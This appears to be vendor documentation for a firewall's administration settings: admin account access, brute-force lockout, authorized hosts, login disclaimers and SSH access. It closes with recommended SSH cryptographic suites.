Firewall administration tab

Access to the firewall’s administration interface

Allow the 'admin' account to log in The admin account is the only account with all privileges and can connect without using certificates. Unselect this checkbox to disable the admin account’s access to the firewall’s administration interface. It will still have access to the firewall in SSH or in console mode.

IMPORTANT
This account must be considered “dangerous”, given the extent of its configuration possibilities and the access privileges granted to it.

Listening port This field represents the port on which administrators can access the administration interface (https, tcp/443 by default). You can create an additional listening port by clicking on the relevant icon. The new port must use TCP.
Configure the SSL certificate of the service Click on this link to modify the certificate presented by the firewall’s administration interface and authentication portal.
Maximum idle timeout (for all administrators) Set the longest idle timeout allowed for all administrator accounts on the firewall before they are logged out.
Individual administrator accounts can set a different maximum idle timeout in their preferences as long as it is shorter than the maximum timeout configured.
Enable protection from brute force attacks Brute force attacks are defined by the repeated attempts to connect to the firewall, by testing all password combinations possible
This protection applies to all connections for the purpose of firewall administration - connections to the web administration interface as well as SSH connections.
Select this option to enable this protection.
Number of authentication attempts allowed

Maximum number of times an administrator can attempt to connect before being blocked (login/password error or case sensitivity, for example). By default, the number of attempts allowed is limited to 3.

This field can only be accessed if the Enable protection from brute force attacks option is selected.

Freeze time (minutes)

Duration for which an administrator will not be able to log in the firewall after the number of failed attempts specified above. The duration cannot exceed 60 minutes.

This field can only be accessed if the Enable protection from brute force attacks option is selected.

Access to firewall administration pages

Add Select a network object from the drop-down list. It will be treated as an Authorized administration host that will be able to log on to the administration interface. This object may be a host, host group, network or address range.
Delete Select the line to be removed from the list and click on Delete.

Disclaimer for access to the administration interface

Warning file A disclaimer (warning text) can be added to the login page of the firewall's web administration interface, and will appear on the right of the authentication window. Click on Got it to enable this authentication window.
The file containing the text of the disclaimer can be loaded onto the firewall using the file selector .
For a better layout, the text can be in HTML but must not contain JavaScript. Once the file has been saved on the firewall, its contents can be displayed using the button.
Deleting the warning file This button allows you to delete the warning file loaded earlier on the firewall.

Remote SSH access

NOTE
The user must be connected with the admin account to modify parameters for remote access via SSH.

Enable SSH access

SSH (Secure Shell) is a protocol that allows users to log in to a remote host via a secure link. Data is encrypted between hosts. SSH also allows commands to be executed on a remote server.

 

Selecting this option will enable access to the firewall via SSH from accounts declared as firewall administrators with the "Console (SSH)” permission and from the admin account. When this checkbox is not selected, no accounts can connect to the firewall via SSH.

 

All connection attempts, successful or unsuccessful, will be logged.

Enable password access

When this checkbox is selected, all accounts declared as firewall administrators with the "Console (SSH)" permission and the admin account can connect to the firewall via SSH by using their password. When it is unselected, administrators must then use a private/public key pair to authenticate. 

This field can only be accessed if the Enable SSH access option is selected.

Use the nsrpc shell for administrators other than the admin account

When this checkbox is selected, all accounts declared as firewall administrators with the "Console (SSH)" permission use only the nsrpc shell interpreter when they open an SSH session on the firewall. Accessing the firewall in this way allows them to use the CLI/Serverd commands according to the privileges that they hold.

 

When this checkbox is unselected, all accounts declared as firewall administrators with the "Console (SSH)" permission use the nsrpc shell interpreter by default. This does not apply to the admin account and it still benefits from the shell interpreter by default.

IMPORTANT
Accessing the shell interpreter firewall in this way grants unrestricted access equivalent to super-administrator access. Commands used in this type of access are not logged.


This field can only be accessed if the Enable SSH access option is selected.

Listening port

This field represents the port on which administrators can access the firewall via SSH (ssh tcp/22 by default). You can create an additional listening port by clicking on the relevant icon. The new port must use TCP.

This field can only be accessed if the Enable SSH access option is selected.

Recommendations

On the firewall

Recommendations:

  • Use an ECDSA key to authenticate,

  • For use beyond 2030, the smallest group to use must be Diffie-Hellman group 15,

  • Configure the following cryptographic suites in the file ConfigFiles/System:

    [SSHCiphers]

    aes256-gcm@openssh.com

    chacha20-poly1305@openssh.com

    aes256-ctr



    [SSHKex]

    curve25519-sha256

    curve25519-sha256@libssh.org

    ecdh-sha2-nistp256



    [SSHMACs]

    hmac-sha2-256-etm@openssh.com

  • Do not use the Mac-then-Encrypt cryptographic suites:

    hmac-sha2-256
    hmac-sha2-512

On the client workstation that connects to the firewall

We recommend configuring the cryptographic suite ecdsa-sha2-nistp256.